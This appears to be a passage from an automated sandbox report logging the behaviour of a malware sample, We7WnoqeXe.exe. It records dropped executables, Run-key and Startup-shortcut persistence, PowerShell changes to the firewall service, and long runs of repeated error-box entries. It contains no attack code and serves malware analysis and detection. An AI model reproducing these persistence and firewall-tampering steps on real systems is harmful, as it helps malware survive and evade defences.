      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mpssvc
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vms.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vms.exeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinNet
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinNet
      Source: C:\Users\user\AppData\Local\Temp\vms.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
